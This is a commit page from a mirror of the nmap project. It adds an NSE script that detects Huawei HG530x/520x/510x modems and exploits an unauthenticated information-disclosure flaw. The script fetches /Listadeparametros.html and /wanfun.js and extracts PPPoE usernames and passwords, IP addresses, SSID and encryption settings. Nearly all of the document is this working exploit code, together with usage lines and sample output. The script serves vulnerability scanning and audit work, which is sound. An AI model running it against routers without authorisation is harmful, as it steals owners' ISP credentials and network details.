PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-08 13:41:29 +00:00
Code Issues Projects Releases Wiki Activity

Adds http-huawei-hg5xx-vuln. Detects Huawei modems models HG530x, HG520x, HG510x and possibly others that are vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials

Browse Source 
and other interesting configuration values.
This commit is contained in:
paulino
2012-05-27 19:18:23 +00:00
parent 0b41f81489
commit cc1ba1ff3d
2 changed files with 104 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

103
scripts/http-huawei-hg5xx-vuln.nse Normal file
View File

@@ -0,0 +1,103 @@
description = [[
Detects Huawei modems models HG530x, HG520x, HG510x and possibly others that are vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials
and other interesting configuration values.
Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information
including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values.
This vulnerability was discovered and reported by Adiaz from Comunidad Underground de Mexico (http://underground.org.mx).
]]
---
-- @usage nmap -p80 --script http-huawei-hg5xx-vuln <target>
-- @usage nmap -sV http-huawei-hg5xx-vuln <target>
--
-- @output
-- PORT STATE SERVICE VERSION
-- 80/tcp open http Huawei aDSL modem EchoLife HG530 (V100R001B122gTelmex) 4.07 -- UPnP/1.0 (ZyXEL ZyWALL 2)
-- | http-huawei-hg5xx-vuln:
-- | VULNERABLE:
-- | Remote credential and information disclosure in modems Huawei HG5XX
-- | State: VULNERABLE (Exploitable)
-- | Description:
-- | Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure.
-- | Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information
-- | including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values
-- | Disclosure date: 2011-01-1
-- | Extra information:
-- |
-- | Model:EchoLife HG530
-- | Firmware version:V100R001B122gTelmex
-- | External IP:xxx.xxx.xx.xxx
-- | Gateway IP:xxx.xx.xxx.xxx
-- | DNS 1:200.33.146.249
-- | DNS 2:200.33.146.241
-- | Network segment:192.168.1.0
-- | Active ethernet connections:0
-- | Active wireless connections:3
-- | BSSID:0xdeadbeefcafe
-- | Wireless Encryption (Boolean):1
-- | PPPoE username:xxx
-- | PPPoE password:xxx
-- | References:
-- |_ http://routerpwn.com/#huawei
---
author = "Paulino Calderon <calderon () websec mx>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit","version","vuln"}
local shortport = require "shortport"
local http = require "http"
local vulns = require "vulns"
portrule = shortport.http
action = function(host, port)
local vuln = {
title = 'Remote credential and information disclosure in modems Huawei HG5XX',
state = vulns.STATE.NOT_VULN,
description = [[
Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure.
Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information
including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values.]],
references = {
'http://routerpwn.com/#huawei'
},
dates = {
disclosure = {year = '2011', month = '01', day = '1'},
},
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local open_session = http.get(host.ip, port, "/Listadeparametros.html")
if open_session and open_session.status == 200 then
vuln.state = vulns.STATE.EXPLOIT
local _, _, pppoe_user = string.find(open_session.body, 'Usuario PPPoE:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, model = string.find(open_session.body, 'Modelo de m\195\179dem:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, firmware_version = string.find(open_session.body, 'Versi\195\179n de Firmware:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, gateway = string.find(open_session.body, 'Puerta de Enlace de Internet:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, ip = string.find(open_session.body, 'IP de Internet del m\195\179dem:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, dns1 = string.find(open_session.body, 'DNS Primario:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, dns2 = string.find(open_session.body, 'DNS Secundario:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, network_segment = string.find(open_session.body, 'Segmento de Red Local:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, active_ethernet = string.find(open_session.body, 'Conexiones Ethernet Activas:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, active_wireless = string.find(open_session.body, 'Conexiones Inal\195\161mbricas Activas:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, ssid = string.find(open_session.body, 'Nombre de Red Inal\195\161mbrica %(SSID%):</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local _, _, encryption = string.find(open_session.body, 'Encriptaci\195\179n Activada %(0: No, 1:S\195\173%):</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
local info = string.format("\nModel:%s\nFirmware version:%s\nExternal IP:%s\nGateway IP:%s\nDNS 1:%s\nDNS 2:%s\n"..
"Network segment:%s\nActive ethernet connections:%s\nActive wireless connections:%s\nBSSID:%s\nWireless Encryption (Boolean):%s\nPPPoE username:%s\n",
model, firmware_version, ip, gateway, dns1, dns2, network_segment, active_ethernet, active_wireless, ssid, encryption, pppoe_user)
local ppp = http.get(host.ip, port, "/wanfun.js")
if ppp.status and ppp.status == 200 then
local _, _, ppp_pwd = string.find(ppp.body, 'var pwdppp = "(.-)"')
info = string.format("%sPPPoE password:%s", info, ppp_pwd)
end
if firmware_version and model then
port.version.product = string.format("Huawei aDSL modem %s (%s)", model, firmware_version)
nmap.set_port_version(host, port, "hardmatched")
end
vuln.extra_info = info
return vuln_report:make_output(vuln)
end
end

1
scripts/script.db
View File

@@ -144,6 +144,7 @@ Entry { filename = "http-gitweb-projects-enum.nse", categories = { "discovery",
Entry { filename = "http-google-malware.nse", categories = { "discovery", "external", "malware", "safe", } } Entry { filename = "http-google-malware.nse", categories = { "discovery", "external", "malware", "safe", } }
Entry { filename = "http-grep.nse", categories = { "discovery", "safe", } } Entry { filename = "http-grep.nse", categories = { "discovery", "safe", } }
Entry { filename = "http-headers.nse", categories = { "discovery", "safe", } } Entry { filename = "http-headers.nse", categories = { "discovery", "safe", } }
Entry { filename = "http-huawei-hg5xx-vuln.nse", categories = { "exploit", "version", "vuln", } }
Entry { filename = "http-icloud-findmyiphone.nse", categories = { "discovery", "safe", } } Entry { filename = "http-icloud-findmyiphone.nse", categories = { "discovery", "safe", } }
Entry { filename = "http-icloud-sendmsg.nse", categories = { "discovery", "safe", } } Entry { filename = "http-icloud-sendmsg.nse", categories = { "discovery", "safe", } }
Entry { filename = "http-iis-webdav-vuln.nse", categories = { "intrusive", "vuln", } } Entry { filename = "http-iis-webdav-vuln.nse", categories = { "intrusive", "vuln", } }